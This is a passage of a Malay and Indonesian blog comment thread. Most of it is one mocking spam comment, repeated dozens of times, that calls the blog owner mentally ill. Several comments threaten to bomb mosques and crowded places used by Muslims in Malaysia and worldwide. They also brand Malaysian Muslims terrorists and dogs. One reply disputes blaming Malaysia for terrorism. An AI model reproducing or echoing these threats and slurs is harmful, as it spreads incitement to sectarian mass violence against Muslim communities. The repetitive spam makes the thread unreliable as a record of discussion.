    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  67. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  68. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  69. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  70. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  71. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  72. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  73. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  74. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  75. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  76. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  77. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  78. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  79. kepada honey, malon, naga, dan lain2.

    Saya sudah jenuh thd kepalsuan.
    Saya tidak akan ambil pusing thd kasus manohara yg tdk kukenal sama sekali.
    Tapi bom yg menggegegar selama ini justru melumatkan nyawa umat Christiani yg tdk bersabar & SANGAT bersabar saat ini. Otak pengebom konon justru disetir oleh warga negara & bangsa Muslim Malaysia tapi korban nya adalah umat Kristen.
    Kenapa Kristen & negara barat Kristiani melulu yg jadi korban ? Malaysia patut dicurigai. Apa yg dikatakan oleh bang Naga memang benar adanya. Teroris muslim malaysia sdh keterlaluan. Selalu bikin keributan dinegara Indonesia, sdgkan di Malaysia aman2 saja.
    Kami umat Kristiani sdh cukup bersabar. Jgn sampai kami umat Kristiani juga mengirim bom ke mesjid2 atau ke tempat2 yg ramai dikunjungi oleh umat islam.
    Jika kami yg mengirimkan bom pemusnah massal maka akan fatal akibatnya bagi kehidupan kalian muslim. KESABARAN ADA BATASNYA ! Masalah manohara ini urusan sesama muslim. INGAT JGN SAMPAI KAMI ORGANISASI SALIB DUNIA BERBALAS DENDAM, MAKA AKAN RUNYAM MESJID2 DIDUNIA !. KESABARAN ADA BATASNYA, TERUTAMA WARGA & BANGSA MALAYSIA & UMAT TERORIS SEDUNIA, JGN SAMPAI KAMI BERGERILYA. JIKA KAMI YG MENGIRIM BOM MAKA BUKAN MESJID DOANG YG HANCUR TAPI UMAT ISLAM SEWILAYAH MALAYSIA AKAN MENANGIS TERGERUNG2. BAHKAN SULTAN, TENGKU, RAJA & ANJING2 TERORIS BERKEDOK ISLAM AKAN MERASAKAN AKIBAT NYA. HALELUYAH.....AMIN.

    ReplyDelete
  80. Jgn kami umat kristiani doang yg jadi korban bom dari umat islam warga bangsa malaysia.
    Kami umat Kristiani juga akan meledakkan bom yg lebih maha dahsyat di mesjid dan tempat2 vital keramaian yg biasanya dikunjungi oleh umat islam malaysia & umat islam sedunia.
    Kami PASTI akan merealisasikannya. TUNGGU. Kesabaran itu ada batasnya.
    Malaysia selalu membuat kekacauan dinegara Indonesia, sementara di Malaysia aman2 saja.
    Kami akan membalas dendam. Bukan islam saja yg bisa jihad, tapi kami juga bisa melaksanakan perang SALIB. Kami juga bisa bergerilya.

    ReplyDelete
  81. Kami umat Christiani sdh jenuh menghadapi teror bom dari teroris krn korban nya melulu umat kami doang.
    KESABARAN ITU ADA BATASNYA !
    Jika kami hendak bergerilya meledakkan bom di mesjid2 atau tempat2 keramaian yg umum dikunjungi oleh umat islam kami sanggup aja, tapi kami masih bersabar.
    Bukan anda saja yg bisa mengirim bom tapi kami juga bisa meledakkan bom yg lebih dahsyat.
    Tapi kenapa pengebom teroris Nurdin M Top dll selalu warga bangsa Malaysia ? KESABARAN ADA BATASNYA. JGN SAMPAI KAMI UMAT KRISTIANI MENGIRIM BOM KE MESJID2 & TEMPAT KERAMAIAN UMAT MUSLIM YG RAMAI DIKUNJUNGI OLEH UMAT ISLAM MALAYSIA.

    ReplyDelete
  82. Kami umat Christiani sdh jenuh menghadapi teror bom dari teroris krn korban nya melulu umat kami doang.
    KESABARAN ITU ADA BATASNYA !
    Jika kami hendak bergerilya meledakkan bom di mesjid2 atau tempat2 keramaian yg umum dikunjungi oleh umat islam kami sanggup aja, tapi kami masih bersabar.
    Bukan anda saja yg bisa mengirim bom tapi kami juga bisa meledakkan bom yg lebih dahsyat.
    Tapi kenapa pengebom teroris Nurdin M Top dll selalu warga bangsa Malaysia ? KESABARAN ADA BATASNYA. JGN SAMPAI KAMI UMAT KRISTIANI MENGIRIM BOM KE MESJID2 & TEMPAT KERAMAIAN UMAT MUSLIM YG RAMAI DIKUNJUNGI OLEH UMAT ISLAM MALAYSIA.

    ReplyDelete
  83. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  84. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  85. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  86. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  87. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  88. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  89. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  90. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  91. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  92. Kami umat Christiani sdh jenuh menghadapi teror bom dari teroris krn korban nya melulu umat kami doang.
    KESABARAN ITU ADA BATASNYA !
    Jika kami hendak bergerilya meledakkan bom di mesjid2 atau tempat2 keramaian yg umum dikunjungi oleh umat islam kami sanggup aja, tapi kami masih bersabar.
    Bukan anda saja yg bisa mengirim bom tapi kami juga bisa meledakkan bom yg lebih dahsyat.
    Tapi kenapa pengebom teroris Nurdin M Top dll selalu warga bangsa Malaysia ? KESABARAN ADA BATASNYA. JGN SAMPAI KAMI UMAT KRISTIANI MENGIRIM BOM KE MESJID2 & TEMPAT KERAMAIAN UMAT MUSLIM YG RAMAI DIKUNJUNGI OLEH UMAT ISLAM MALAYSIA.

    ReplyDelete
  93. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  94. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  95. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  96. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  97. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  98. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  99. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  100. Kami umat Christiani sdh jenuh menghadapi teror bom dari teroris krn korban nya melulu umat kami doang.
    KESABARAN ITU ADA BATASNYA !
    Jika kami hendak bergerilya meledakkan bom di mesjid2 atau tempat2 keramaian yg umum dikunjungi oleh umat islam kami sanggup aja, tapi kami masih bersabar.
    Bukan anda saja yg bisa mengirim bom tapi kami juga bisa meledakkan bom yg lebih dahsyat.
    Tapi kenapa pengebom teroris Nurdin M Top dll selalu warga bangsa Malaysia ? KESABARAN ADA BATASNYA. JGN SAMPAI KAMI UMAT KRISTIANI MENGIRIM BOM KE MESJID2 & TEMPAT KERAMAIAN UMAT MUSLIM YG RAMAI DIKUNJUNGI OLEH UMAT ISLAM MALAYSIA.

    ReplyDelete
  101. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  102. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  103. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  104. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  105. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  106. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  107. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  108. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  109. @Eva,
    Apa kena mengena terrorists dengan malaysia? Cuma 2 ke 3 org rakyat malaysia yg kawin dengan indon dan tinggal kat indon kendian jadi pengganas korang tuduh malaysia pengganas?

    Hello2 mbak, indonesia tu yg jadi pusat rekrutment dan latihan pengganas se asia tenggara, tau tak? Kalau tak tau pergi ke encylopedia britania dan search ok.

    Pemerintah indonesia jangan duduk memerintah je kenalah buat kerja, seriouslah sikit tangani masalah keganasan. kenapa dah bertahun tahun masih tak dapat tangkap pengganas2 ni semua? Tuhari pengganas singapore lari, polis malaysia dah dapat tangkap. kalau dia lari masuk indonesia, tentu sampai sekarang tak dapat lagi. Polis dgn pemerintah indonesia kenalah serious nak tangkap diorg ni jangan asyik menuding je.

    seme kelemahan negara korang, kegagalan negara korang kau tuding jari kat malaysia, sampai bila korang nak baiki diri korang kalau asyik salahkan org lain? cubalah belajar dari kelemahan dan kegagalan sendiri oiii.

    Lagi satu mbak, orang islam pun marah ngan pengganas ni bukan kritian jer. orang islam pun ada yg matilah.

    Eh mbak eva ni salah channel ke aku yg salah channel huh? Sorry geram betul.....

    ReplyDelete
  110. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  111. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  112. Kami umat Christiani sdh jenuh menghadapi teror bom dari teroris krn korban nya melulu umat kami doang.
    KESABARAN ITU ADA BATASNYA !
    Jika kami hendak bergerilya meledakkan bom di mesjid2 atau tempat2 keramaian yg umum dikunjungi oleh umat islam kami sanggup aja, tapi kami masih bersabar.
    Bukan anda saja yg bisa mengirim bom tapi kami juga bisa meledakkan bom yg lebih dahsyat.
    Tapi kenapa pengebom teroris Nurdin M Top dll selalu warga bangsa Malaysia ? KESABARAN ADA BATASNYA. JGN SAMPAI KAMI UMAT KRISTIANI MENGIRIM BOM KE MESJID2 & TEMPAT KERAMAIAN UMAT MUSLIM YG RAMAI DIKUNJUNGI OLEH UMAT ISLAM MALAYSIA.

    ReplyDelete
  113. Kami umat Christiani sdh jenuh menghadapi teror bom dari teroris krn korban nya melulu umat kami doang.
    KESABARAN ITU ADA BATASNYA !
    Jika kami hendak bergerilya meledakkan bom di mesjid2 atau tempat2 keramaian yg umum dikunjungi oleh umat islam kami sanggup aja, tapi kami masih bersabar.
    Bukan anda saja yg bisa mengirim bom tapi kami juga bisa meledakkan bom yg lebih dahsyat.
    Tapi kenapa pengebom teroris Nurdin M Top dll selalu warga bangsa Malaysia ? KESABARAN ADA BATASNYA. JGN SAMPAI KAMI UMAT KRISTIANI MENGIRIM BOM KE MESJID2 & TEMPAT KERAMAIAN UMAT MUSLIM YG RAMAI DIKUNJUNGI OLEH UMAT ISLAM MALAYSIA.

    ReplyDelete
  114. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  115. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  116. UNTUK PENGETAHUAN SEMWANYA

